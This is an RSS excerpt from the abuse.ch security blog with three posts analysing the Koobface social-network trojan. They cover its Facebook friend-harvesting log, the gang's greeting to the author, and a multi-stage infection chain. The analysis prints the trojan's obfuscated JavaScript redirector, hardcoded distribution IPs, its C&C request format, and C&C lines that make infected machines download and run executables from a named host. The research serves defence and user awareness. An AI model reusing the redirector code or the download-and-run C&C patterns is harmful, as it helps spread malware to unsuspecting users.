20100109 16:38:54 ThreadID:1504 ProcID: 1516 confirmer module start<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 checking login<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 C:\Documents and settings\USER\Cookies<br />
20100109 16:39:08 ThreadID:1504 ProcID: 1516 fb logoff begin<br />
20100109 16:39:13 ThreadID:1504 ProcID: 1516 logout link not found<br />
20100109 16:39:13 ThreadID:1504 ProcID: 1516 trying to login<br />
20100109 16:39:17 ThreadID:1504 ProcID: 1516 fill login<br />
20100109 16:39:17 ThreadID:1504 ProcID: 1516 check persist<br />
20100109 16:39:20 ThreadID:1504 ProcID: 1516 fill pass<br />
20100109 16:39:22 ThreadID:1504 ProcID: 1516 try submit<br />
20100109 16:39:22 ThreadID:1504 ProcID: 1516 click submit button<br />
20100109 16:39:30 ThreadID:1504 ProcID: 1516 seem to be logged in<br />
20100109 16:39:35 ThreadID:1504 ProcID: 1516 confirm acc start<br />
20100109 16:39:40 ThreadID:1504 ProcID: 1516 ERROR: skip step link not found<br />
20100109 16:39:40 ThreadID:1504 ProcID: 1516 login ok<br />
20100109 16:39:45 ThreadID:1504 ProcID: 1516 groups confirm begin<br />
20100109 16:39:53 ThreadID:1504 ProcID: 1516 groups confirm end<br />
20100109 16:39:53 ThreadID:1504 ProcID: 1516 friend request confirm begin<br />
20100109 16:39:58 ThreadID:1504 ProcID: 1516 friend request confirm end<br />
20100109 16:39:58 ThreadID:1504 ProcID: 1516 scan friend begin<br />
20100109 16:40:04 ThreadID:1504 ProcID: 1516 no friends found<br />
20100109 16:40:04 ThreadID:1504 ProcID: 1516 scan friend end<br />
20100109 16:40:04 ThreadID:1504 ProcID: 1516 Stats: added 0<br />
20100109 16:40:04 ThreadID:1504 ProcID: 1516 PLACES DUMP<br />
20100109 16:40:04 ThreadID:1504 ProcID: 1516<br />
20100109 16:40:04 ThreadID:1504 ProcID: 1516 finished</p></div>
<p>As you can see, the log is quite detailed (yeah, &#8220;click submit button&#8221; and &#8220;scan friend end&#8221; sounds funny&#8230;).<br />
Now the trojan will start to &#8220;get some&#8221; friends. I suppose that the trojan will parse the member list of the group which he has received from the C&#038;C server when he has requested the <em>grgen</em> module:</p>
<p><a href="http://www.abuse.ch/wp-content/facebook_addfriend.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/facebook_addfriend-300x129.jpg" alt="" title="Koobface sending out friend requests on Facebook" width="300" height="129" class="aligncenter size-medium wp-image-2285" /></a></p>
<p>Let&#8217;s wait some minutes&#8230;.. and then we will take another look at the malicious profile:</p>
<p><a href="http://www.abuse.ch/wp-content/facebook_friends.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/facebook_friends-300x217.jpg" alt="" title="Friends of the spoofed Facebook profile created by Koobface" width="300" height="217" class="aligncenter size-medium wp-image-2278" /></a></p>
<p>As you can see, the Koobface bot just sent out more than <strong>1&#8242;000 friend requests on Facebook within a few minutes!</strong> But what suprised me much more is the fact, that all those people accepted the friend request. So I just ask myself why so much people accept friend requests from other people which they don&#8217;t even know?</p>
<p><a href="http://www.abuse.ch/wp-content/facebook_inbox.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/facebook_inbox-300x217.jpg" alt="" title="Inbox of the malicious Facebook account" width="300" height="217" class="aligncenter size-medium wp-image-2283" /></a></p>
<p><strong>Conclusion</strong><br />
Within a few minutes, more than 1&#8242;000 new friends were harvested by Koobface &#8211; all of them are potential victims now; as soon as the bot starts to send out posts/messages, it becomes a real threat to its <em>friends</em>.</p>
<p>So what we have learned:</p>
<ul>
<li>Please be careful with friend request from persons which you don&#8217;t know (this also applies to all other social networks like myspace, netlog, hi5 etc)</li>
<li>If you find a malicious profile, report it to the administrator of the social network (eg. by using the <em>report button</em>)</li>
<li>And last but not least: If you go to Facebook and you are logged in with a unknown profile, you are infected with Koobface&#8230;.</li>
</ul>
<p>Happy (and safe) social networking!</p>
<div class='bookmarkify'><a name='bookmarkify'></a><div class='title' title='Use these links to share this page with others'>Bookmark, tagg it or email it to a friend:</div><div class='linkbuttons'><a href='http://www.bloglines.com/sub/http://www.abuse.ch/?p=2268' title='Save to Bloglines' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/bloglines.png' style='width:16px; height:16px;' alt='[Bloglines] ' /></a> <a href='http://del.icio.us/post?url=http://www.abuse.ch/?p=2268&amp;title=Dangerous friend requests on Facebook' title='Save to del.icio.us' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/delicious.png' style='width:16px; height:16px;' alt='[del.icio.us] ' /></a> <a href='http://digg.com/submit?phase=2&amp;url=http://www.abuse.ch/?p=2268&amp;title=Dangerous friend requests on Facebook' title='Digg It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/digg.png' style='width:16px; height:16px;' alt='[Digg] ' /></a> <a href='http://www.facebook.com/share.php?u=http://www.abuse.ch/?p=2268' title='Save to Facebook' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/facebook.png' style='width:16px; height:16px;' alt='[Facebook] ' /></a> <a href='http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.abuse.ch/?p=2268&amp;title=Dangerous friend requests on Facebook' title='Save to Google Bookmarks' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/google.png' style='width:16px; height:16px;' alt='[Google] ' /></a> <a href='http://www.mister-wong.com/index.php?action=addurl&amp;bm_url=http://www.abuse.ch/?p=2268&amp;bm_description=Dangerous friend requests on Facebook' title='Save to Mister Wong' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/misterwong.png' style='width:16px; height:16px;' alt='[Mister Wong] ' /></a> <a href='http://www.myspace.com/Modules/PostTo/Pages/?c=http://www.abuse.ch/?p=2268&amp;t=Dangerous friend requests on Facebook' title='Save to MySpace' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/myspace.png' style='width:16px; height:16px;' alt='[MySpace] ' /></a> <a href='http://slashdot.org/bookmark.pl?url=http://www.abuse.ch/?p=2268&amp;title=Dangerous friend requests on Facebook' title='Slashdot It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/slashdot.png' style='width:16px; height:16px;' alt='[Slashdot] ' /></a> <a href='http://technorati.com/faves?add=http://www.abuse.ch/?p=2268' title='Add to my Technorati Favorites' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/technorati.png' style='width:16px; height:16px;' alt='[Technorati] ' /></a>  <a title='See more bookmark and sharing options...' href='http://www.abuse.ch/?p=2268#bookmarkify' rel='nofollow'><small>More&nbsp;&raquo;</small></a></div></div>
<p><a href="http://feedads.g.doubleclick.net/~a/uSI7QXOLnBU0rg__6y20BUyRINg/0/da"><img src="http://feedads.g.doubleclick.net/~a/uSI7QXOLnBU0rg__6y20BUyRINg/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/uSI7QXOLnBU0rg__6y20BUyRINg/1/da"><img src="http://feedads.g.doubleclick.net/~a/uSI7QXOLnBU0rg__6y20BUyRINg/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Abusech/~4/hw_TOET6mQI" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.abuse.ch/?feed=rss2&amp;p=2268</wfw:commentRss>
		<slash:comments>4</slash:comments>
		<feedburner:origLink>http://www.abuse.ch/?p=2268</feedburner:origLink></item>
		<item>
		<title>Christmas greetings from Koobface to abuse.ch</title>
		<link>http://feedproxy.google.com/~r/Abusech/~3/KSSVcBtzOgY/</link>
		<comments>http://www.abuse.ch/?p=2240#comments</comments>
		<pubDate>Sun, 27 Dec 2009 15:32:10 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware & Virus Analysing]]></category>
		<category><![CDATA[Koobface]]></category>
		<category><![CDATA[xmas]]></category>

		<guid isPermaLink="false">http://www.abuse.ch/?p=2240</guid>
		<description><![CDATA[Most of the time I&#8217;m aware of the users which are reading my blog frequently&#8230; But I have to admit that I was really suprised today.
Recently I took a look into the Koobface trojan and it&#8217;s infrastructure. The result of my research was the post &#8220;Koobface – the social network trojan&#8220;.
Today, while I read thru [...]]]></description>
			<content:encoded><![CDATA[<p>Most of the time I&#8217;m aware of the users which are reading my blog frequently&#8230; But I have to admit that I was really suprised today.</p>
<p>Recently I took a look into the Koobface trojan and it&#8217;s infrastructure. The result of my research was the post &#8220;<a href="http://www.abuse.ch/?p=2103" target="_blank">Koobface – the social network trojan</a>&#8220;.</p>
<p>Today, while I read thru my favorit blogs, I came across the post <a href="http://ddanchev.blogspot.com/2009/12/koobface-gang-wishes-industry-happy.html" target="_blank">The Koobface Gang Wishes the Industry &#8220;Happy Holidays</a>&#8221; at Dancho Danchev&#8217;s blog. It tells  that the cybercriminals behind the Koobface trojan just published a <em>Merry Christmas wish</em> on the <strong>fourth</strong> (and final stage) of their <a href="http://www.abuse.ch/wp-content/koobface_infection_vector.jpg" target="_blank">infection process</a>. </p>
<p><a href="http://www.abuse.ch/wp-content/koobface_xmasgreetings.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/koobface_xmasgreetings-300x205.jpg" alt="" title="Koobface Christmas Greetings" width="300" height="205" class="aligncenter size-medium wp-image-2244" /></a></p>
<p>If you scroll down at the end of the page the following text appears:</p>
<p><a href="http://www.abuse.ch/wp-content/koobface_xmasgreetings_abusech.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/koobface_xmasgreetings_abusech-300x100.jpg" alt="" title="Koobface Christmas Greetings to abuse.ch" width="300" height="100" class="aligncenter size-medium wp-image-2246" /></a></p>
<p>When you read thru the text above, you will ask yourself &#8220;who is Soren Siebert&#8221;? I just asked me the same question, but I have an answer on this. When you look at the HTML Source code of the page, you will see that the text &#8220;Soren Siebert with his great article&#8221; refers to my post about the Koobface trojan:</p>
<pre>
<div class="codesnip-container" >
<div class="html4strict codesnip" style="font-family:monospace;">Soren Siebert with his <span class="sc2">&lt;<a href="http://december.com/html/4/element/a.html"><span class="kw2">a</span></a> <span class="kw3">href</span><span class="sy0">=</span><span class="st0">&quot;http://www.abuse.ch/?p=2103&quot;</span> <span class="kw3">target</span><span class="sy0">=</span><span class="st0">&quot;_blank&quot;</span> &gt;</span>great article<span class="sc2">&lt;<span class="sy0">/</span><a href="http://december.com/html/4/element/a.html"><span class="kw2">a</span></a>&gt;</span></div>
</div>
</pre>
<p>People how knew me personally also know that my real name isn&#8217;t <em>Soren Siebert</em>. Let me explain how the Koobface gang came across this name. On my blog you will find a reference to a <a href="http://www.abuse.ch/?page_id=2" target="_blank">disclaimer page</a> in the navgiation bar. The disclaimer is written in german and was generated with a impressum generator provided by e-recht24.de. The webpage and the impressum generator is maintained by a <strong>laywer called Sören Siebert</strong>, which is also mentioned as source of the text on my disclaimer. So the Koobface gang just came across this name on my disclaimer and thought that this is my name.</p>
<p>Anyway, I&#8217;m a bit proud that the Koobface gang read my post about their trojan and the fact that my post was mentioned in the same way as well-known Antivirus vedors like <a href="http://www.kaspersky.com" target="_blank">Kaspersky</a> and <a href="http://www.trendmicro.com" target="_blank">Trend Micro</a>. That was a great Xmas gift from the Koobface gange &#8211; thank you! <img src='http://www.abuse.ch/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<div class='bookmarkify'><a name='bookmarkify'></a><div class='title' title='Use these links to share this page with others'>Bookmark, tagg it or email it to a friend:</div><div class='linkbuttons'><a href='http://www.bloglines.com/sub/http://www.abuse.ch/?p=2240' title='Save to Bloglines' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/bloglines.png' style='width:16px; height:16px;' alt='[Bloglines] ' /></a> <a href='http://del.icio.us/post?url=http://www.abuse.ch/?p=2240&amp;title=Christmas greetings from Koobface to abuse.ch' title='Save to del.icio.us' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/delicious.png' style='width:16px; height:16px;' alt='[del.icio.us] ' /></a> <a href='http://digg.com/submit?phase=2&amp;url=http://www.abuse.ch/?p=2240&amp;title=Christmas greetings from Koobface to abuse.ch' title='Digg It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/digg.png' style='width:16px; height:16px;' alt='[Digg] ' /></a> <a href='http://www.facebook.com/share.php?u=http://www.abuse.ch/?p=2240' title='Save to Facebook' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/facebook.png' style='width:16px; height:16px;' alt='[Facebook] ' /></a> <a href='http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.abuse.ch/?p=2240&amp;title=Christmas greetings from Koobface to abuse.ch' title='Save to Google Bookmarks' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/google.png' style='width:16px; height:16px;' alt='[Google] ' /></a> <a href='http://www.mister-wong.com/index.php?action=addurl&amp;bm_url=http://www.abuse.ch/?p=2240&amp;bm_description=Christmas greetings from Koobface to abuse.ch' title='Save to Mister Wong' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/misterwong.png' style='width:16px; height:16px;' alt='[Mister Wong] ' /></a> <a href='http://www.myspace.com/Modules/PostTo/Pages/?c=http://www.abuse.ch/?p=2240&amp;t=Christmas greetings from Koobface to abuse.ch' title='Save to MySpace' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/myspace.png' style='width:16px; height:16px;' alt='[MySpace] ' /></a> <a href='http://slashdot.org/bookmark.pl?url=http://www.abuse.ch/?p=2240&amp;title=Christmas greetings from Koobface to abuse.ch' title='Slashdot It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/slashdot.png' style='width:16px; height:16px;' alt='[Slashdot] ' /></a> <a href='http://technorati.com/faves?add=http://www.abuse.ch/?p=2240' title='Add to my Technorati Favorites' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/technorati.png' style='width:16px; height:16px;' alt='[Technorati] ' /></a>  <a title='See more bookmark and sharing options...' href='http://www.abuse.ch/?p=2240#bookmarkify' rel='nofollow'><small>More&nbsp;&raquo;</small></a></div></div>
<p><a href="http://feedads.g.doubleclick.net/~a/0B8nnooucbTMi2CMPMcsO7M07Lo/0/da"><img src="http://feedads.g.doubleclick.net/~a/0B8nnooucbTMi2CMPMcsO7M07Lo/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/0B8nnooucbTMi2CMPMcsO7M07Lo/1/da"><img src="http://feedads.g.doubleclick.net/~a/0B8nnooucbTMi2CMPMcsO7M07Lo/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Abusech/~4/KSSVcBtzOgY" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.abuse.ch/?feed=rss2&amp;p=2240</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://www.abuse.ch/?p=2240</feedburner:origLink></item>
		<item>
		<title>Koobface – the social network trojan</title>
		<link>http://feedproxy.google.com/~r/Abusech/~3/FLIFjcqioa0/</link>
		<comments>http://www.abuse.ch/?p=2103#comments</comments>
		<pubDate>Sun, 06 Dec 2009 12:36:19 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware & Virus Analysing]]></category>
		<category><![CDATA[captcha breaking]]></category>
		<category><![CDATA[captchastop.com]]></category>
		<category><![CDATA[capthcabreak.com]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Koobface]]></category>
		<category><![CDATA[social network]]></category>
		<category><![CDATA[uuu20091124.info]]></category>
		<category><![CDATA[ze-biz.com]]></category>

		<guid isPermaLink="false">http://www.abuse.ch/?p=2103</guid>
		<description><![CDATA[The last few days I took a look at a trojan called &#8220;Koobface&#8221;. Due to the fact that the trojan isn&#8217;t really new, I&#8217;m pretty sure that many of you already heard about this trojan, but I just started to study the Koobface threat this week. First of all some general words about Koobface (for [...]]]></description>
			<content:encoded><![CDATA[<p>The last few days I took a look at a trojan called &#8220;Koobface&#8221;. Due to the fact that the trojan isn&#8217;t really new, I&#8217;m pretty sure that many of you already heard about this trojan, but I just started to study the Koobface threat this week. First of all some general words about Koobface (for those of you which don&#8217;t know the trojan yet):</p>
<p>The trojan is targeting users of social networks like Facebook and Myspace. Therefore the trojan have it&#8217;s name (Koobface) from &#8220;Facebook&#8221;. The trojan uses different modules which will be dropped from the internet after a successful infection. For example there is a module for captcha breaking and a module to create Blogspot accounts.</p>
<p>Let&#8217;s start with the way the Koobface trojan spreads itself (this is quite interesting).</p>
<p><strong>*** Koobface Infection vector ***</strong><br />
I&#8217;ve just made a small chart which describes the way Koobface spreads itself:<br />
<center><em><a href="http://www.abuse.ch/wp-content/koobface_infection_vector.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/koobface_infection_vector-300x129.jpg" alt="Koobface infection vector" title="Koobface infection vector" width="300" height="129" class="aligncenter size-medium wp-image-2130" /></a>(click to enlarge)</em></center><br />
As you can see on the chart above, Koobface is using a sophisticated strategy to hide the way it is infecting it&#8217;s victims. Initially the Koobface trojan publishes comments/posts on social networks like Facebook and Twitter (<strong>Stage 1</strong>) which are pointing to malicious blogspot / bit.ly URLs (<strong>Stage 2</strong>). These blogspot / bit.ly URLs has been registered previously by computers which are already infected with Koobface (bots) using a captcha breaking module (more on this later). The URLs in the <strong>second stage</strong> will redirect the victim to a hijacked website in the <strong>third stage</strong>. But thats not the end of the story: The hijacked websites hosting pages with a Javascript. The Javascript causes that the victim will be redirected again to the <strong>fourth stage</strong> which is finally spreading the trojan.</p>
<p>Here are some interesting stats about the amout of URLs which are used in this sophisticated attack:</p>
<p>Number of faked blogpost/bit.ly URLs in Stage 2: <strong>34&#8242;332</strong>*<br />
Number of hijacked websites in Stage 3: <strong>509</strong></p>
<p><em>* number still growing</em></p>
<p>You can view the full list of the faked blogspot/bit.ly URLs on the following page (the two lists will be updated in real time):</p>
<ul>
<li><a href="http://www.abuse.ch/downloads/koobface_blogspot.php" target="_blank">List of faked blogpost URLs</a></li>
<li><a href="http://www.abuse.ch/downloads/koobface_bitly.php">List of faked bit.ly URLs</a></li>
</ul>
<p>The list of hijacked websites won&#8217;t be published. But I can publish a statistical breakdown about the geo location of the hijacked websites used by koobface:</p>
<p><center><em><a href="http://www.abuse.ch/wp-content/hijacked_websites_geolocation.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/hijacked_websites_geolocation-300x183.jpg" alt="Koobface hijacked websites geo location" title="Koobface hijacked websites geo location" width="300" height="183" class="aligncenter size-medium wp-image-2174" /></a><br />
Click to enlarge</em></center><br />
Let&#8217;s take a deeper look into the things happen in <strong>stage 2-4</strong>.<br />
The blogpost URLs in the <strong>second stage</strong> contains Java Script code at the top of the page which will cause a redirection to a page in the <strong>third stage</strong>  (the code vary):</p>
<pre>
<div class="codesnip-container" >
<div class="javascript codesnip" style="font-family:monospace;"><span class="sy0">&lt;</span>script<span class="sy0">&gt;</span>c6833<span class="sy0">=</span><span class="st0">'do'</span><span class="sy0">;</span>dc0d1bd<span class="sy0">=</span><span class="st0">&quot;cqfiuqbemnit&quot;</span>.<span class="me1">replace</span><span class="br0">&#40;</span><span class="co2">/[qfibent]+/g</span><span class="sy0">,</span><span class="st0">&quot;&quot;</span><span class="br0">&#41;</span><span class="sy0">;</span>ed9e<span class="sy0">=</span><span class="st0">'ent.r'</span><span class="sy0">;</span>
f1987<span class="sy0">=</span><span class="st0">&quot;esafvnsaearvub&quot;</span>.<span class="me1">replace</span><span class="br0">&#40;</span><span class="co2">/[savnub]+/g</span><span class="sy0">,</span><span class="st0">&quot;&quot;</span><span class="br0">&#41;</span><span class="sy0">;</span>ge2<span class="sy0">=</span><span class="st0">'rer'</span><span class="sy0">;</span>
ac8<span class="sy0">=</span><span class="kw1">eval</span><span class="br0">&#40;</span>c6833<span class="sy0">+</span>dc0d1bd<span class="sy0">+</span>ed9e<span class="sy0">+</span>f1987<span class="sy0">+</span>ge2<span class="br0">&#41;</span><span class="sy0">;</span>b3c1<span class="sy0">=</span><span class="st0">''</span><span class="sy0">;</span>h0cf16c3<span class="sy0">=</span><span class="st0">'mspli'</span><span class="sy0">;</span>
i7775<span class="sy0">=</span><span class="st0">&quot;npkjdstd.dpcrloffrhm&quot;</span>.<span class="me1">replace</span><span class="br0">&#40;</span><span class="co2">/[pjdtrlfh]+/g</span><span class="sy0">,</span><span class="st0">&quot;&quot;</span><span class="br0">&#41;</span><span class="sy0">;</span>j26<span class="sy0">=</span><span class="st0">'mys'</span><span class="sy0">;</span>
kb96<span class="sy0">=</span><span class="st0">&quot;pdjaglfcfehrn.lfhcbomdk&quot;</span>.<span class="me1">replace</span><span class="br0">&#40;</span><span class="co2">/[djglfhrnbk]+/g</span><span class="sy0">,</span><span class="st0">&quot;&quot;</span><span class="br0">&#41;</span><span class="sy0">;</span>l92<span class="sy0">=</span><span class="st0">'lnk'</span><span class="sy0">;</span>
m4ab1fa22<span class="sy0">=</span><span class="st0">&quot;.vmblsdxw&quot;</span>.<span class="me1">replace</span><span class="br0">&#40;</span><span class="co2">/[vbldxw]+/g</span><span class="sy0">,</span><span class="st0">&quot;&quot;</span><span class="br0">&#41;</span><span class="sy0">;</span>o5da6f7e8<span class="sy0">=</span>ac8.<span class="me1">indexOf</span><span class="br0">&#40;</span>h0cf16c3<span class="sy0">+</span>i7775<span class="br0">&#41;</span><span class="sy0">;</span>
p7e259a<span class="sy0">=</span>ac8.<span class="me1">indexOf</span><span class="br0">&#40;</span>j26<span class="sy0">+</span>kb96<span class="br0">&#41;</span><span class="sy0">;</span>q89<span class="sy0">=</span>ac8.<span class="me1">indexOf</span><span class="br0">&#40;</span>l92<span class="sy0">+</span>m4ab1fa22<span class="br0">&#41;</span><span class="sy0">;</span>
<span class="kw1">if</span><span class="br0">&#40;</span>o5da6f7e8<span class="sy0">+</span>p7e259a<span class="sy0">+</span>q89<span class="sy0">!=-</span><span class="nu0">3</span><span class="br0">&#41;</span>b3c1<span class="sy0">=</span><span class="st0">'&amp;ms'</span><span class="sy0">;</span>
ncd1b57<span class="sy0">=</span><span class="st0">&quot;hlbftqkmtmjpl:biff/gm/gbnmlbaqciinqbeklq.gfmnbmgag.qgoccchilobjbsit.
gbldjfcleck/c2m9jb2q/m&quot;</span>.<span class="me1">replace</span><span class="br0">&#40;</span><span class="co2">/[lbfqkmjigc]+/g</span><span class="sy0">,</span><span class="st0">&quot;&quot;</span><span class="br0">&#41;</span><span class="sy0">;</span>
location<span class="sy0">=</span>ncd1b57<span class="sy0">+</span><span class="st0">&quot;?biugbxosmt&quot;</span>.<span class="me1">replace</span><span class="br0">&#40;</span><span class="co2">/[biuxsmt]+/g</span><span class="sy0">,</span><span class="st0">&quot;&quot;</span><span class="br0">&#41;</span><span class="sy0">+</span>b3c1<span class="sy0">;&lt;/</span>script<span class="sy0">&gt;</span></div>
</div>
</pre>
<p>The bit.ly URLs in in the <strong>second stage</strong> won&#8217;t need any additional code &#8211; they will redirect the victim to a hijacked websites in the <strong>third stage</strong> directly.</p>
<p>As I said before, the hijacked websites in the <strong>third stage</strong> are hosting Javascript code which causes that the victim will be redirected to the last stage which is finaly spreading the trojan. The IPs of the <strong>fourth stage</strong> webservers are hardcoded into the <strong>third stage</strong> javascript code (the list of IPs vary) :</p>
<pre>
<div class="codesnip-container" >
<div class="javascript codesnip" style="font-family:monospace;"><span class="kw2">var</span> ipxgzet0 <span class="sy0">=</span> <span class="br0">&#91;</span>
<span class="st0">'24.3'</span> <span class="sy0">+</span> <span class="st0">'0.126.138'</span><span class="sy0">,</span>
<span class="st0">'98.'</span> <span class="sy0">+</span> <span class="st0">'206.3.117'</span><span class="sy0">,</span>
<span class="st0">'90.'</span> <span class="sy0">+</span> <span class="st0">'233.128.87'</span><span class="sy0">,</span>
<span class="st0">'1'</span> <span class="sy0">+</span> <span class="st0">'90.49.190.60'</span><span class="sy0">,</span>
<span class="st0">'217.1'</span> <span class="sy0">+</span> <span class="st0">'32.165.11'</span><span class="sy0">,</span>
<span class="st0">'67'</span> <span class="sy0">+</span> <span class="st0">'.173.62.160'</span><span class="sy0">,</span>
<span class="st0">'6'</span> <span class="sy0">+</span> <span class="st0">'6.57.229.246'</span><span class="sy0">,</span>
<span class="st0">'17'</span> <span class="sy0">+</span> <span class="st0">'4.103.205.78'</span><span class="sy0">,</span>
<span class="st0">'84.1'</span> <span class="sy0">+</span> <span class="st0">'09.34.247'</span><span class="sy0">,</span>
<span class="st0">'79.176.'</span> <span class="sy0">+</span> <span class="st0">'126.109'</span><span class="sy0">,</span>
<span class="st0">'8'</span> <span class="sy0">+</span> <span class="st0">'2.44.232.81'</span><span class="sy0">,</span>
<span class="st0">'17'</span> <span class="sy0">+</span> <span class="st0">'3.21.165.56'</span><span class="sy0">,</span>
<span class="st0">'67.250'</span> <span class="sy0">+</span> <span class="st0">'.29.114'</span><span class="sy0">,</span>
<span class="st0">'99.15'</span> <span class="sy0">+</span> <span class="st0">'5.75.173'</span><span class="sy0">,</span>
<span class="st0">'1'</span> <span class="sy0">+</span> <span class="st0">'73.29.194.142'</span><span class="sy0">,</span>
<span class="st0">'7'</span> <span class="sy0">+</span> <span class="st0">'1.236.10.136'</span><span class="sy0">,</span>
<span class="st0">'94.171'</span> <span class="sy0">+</span> <span class="st0">'.96.107'</span><span class="sy0">,</span>
<span class="st0">'1'</span> <span class="sy0">+</span> <span class="st0">'30.208.150.33'</span><span class="sy0">,</span>
<span class="st0">'70.244.'</span> <span class="sy0">+</span> <span class="st0">'114.178'</span><span class="sy0">,</span>
<span class="st0">'99.1'</span> <span class="sy0">+</span> <span class="st0">'2.240.214'</span><span class="sy0">,</span>
<span class="br0">&#93;</span><span class="sy0">;</span></div>
</div>
</pre>
<p>As you can see, the IPs are obfuscated. If you deobfuscate the list above you will find these IPs:</p>
<div class="codesnip-container" >98.206.3.117<br />
90.233.128.87<br />
190.49.190.60<br />
217.132.165.11<br />
67.173.62.160<br />
66.57.229.246<br />
174.103.205.78<br />
84.109.34.247<br />
79.176.126.109<br />
82.44.232.81<br />
173.21.165.56<br />
67.250.29.114<br />
99.155.75.173<br />
173.29.194.142<br />
71.236.10.136<br />
94.171.96.107<br />
130.208.150.33<br />
70.244.114.178<br />
99.12.240.214</div>
<p>Finally the victim will be redirected to one of the IPs above which serves him a file called &#8220;setup.exe&#8221; (which contains the Koobface trojan):</p>
<p><center><em><a href="http://www.abuse.ch/wp-content/koobface_stage4.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/koobface_stage4-300x205.jpg" alt="Koobface stage 4" title="Koobface stage 4" width="300" height="205" class="aligncenter size-medium wp-image-2143" /></a><br />
Click to enlarge</em></center><br />
<strong>*** The Koobface Trojan ***</strong><br />
If the victim runs the binary (setup.exe), the Trojan will infect the computer creating the following file in the <em>Windows directory</em>:</p>
<div class="codesnip-container" >C:\WINDOWS\ld15.exe (<a href="http://www.virustotal.com/de/analisis/d3b4e4adb85cba1c61bac1da44b4dc026bb1fcbe90a62cf35a2652c29fd37fc6-1259946035" target="_blank">VT: 15/41 (36.59%)</a>)</div>
<p>Afterwards the trojan is testing the victims internet connection by sending a HTTP GET request to www.google.com:</p>
<div class="codesnip-container" >GET / HTTP/1.1<br />
Host: www.google.com<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )<br />
Content-type: application/x-www-form-urlencoded<br />
Connection: close</div>
<p>If google.com answers the trojan contacts one of the 509 hijacked websites, which are already being used previously in the <strong>third stage</strong>:</p>
<div class="codesnip-container" >POST /.sys/?action=ldgen&#038;v=15 HTTP/1.1<br />
Host: xxxxxx.com<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )<br />
Content-type: application/x-www-form-urlencoded<br />
Connection: close<br />
Content-Length: 0</div>
<p>But its not as easy: The hijacked websites are just being used as redirectors/proxies which will forward the request from the infected client to the real Command&#038;Control server (C&#038;C):</p>
<p><center><em><a href="http://www.abuse.ch/wp-content/koobface_cc_infrastructure.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/koobface_cc_infrastructure-300x212.jpg" alt="Koobface Command&amp;Control server infrastructure" title="Koobface Command&amp;Control server infrastructure" width="300" height="212" class="aligncenter size-medium wp-image-2160" /></a>Click to enlarge</em></center></p>
<p>The traffic between the infected computer and the zombie/proxy is unencrypted. The answer of the Command&#038;Control server starts with the string &#8220;#BLACKLABEL&#8221;. Due to this Koobface Command&#038;Control server traffic is very easy to detect. The answer of the C&#038;C server can look like this:</p>
<div class="codesnip-container" >#BLACKLABEL<br />
#GEO=FR<br />
#IP=93.221.17.34<br />
#PID=1000<br />
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=go.exe<br />
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=fb.75.exe<br />
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=be.18.exe<br />
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=ms.25.exe<br />
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=hi.15.exe<br />
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=tg.14.exe<br />
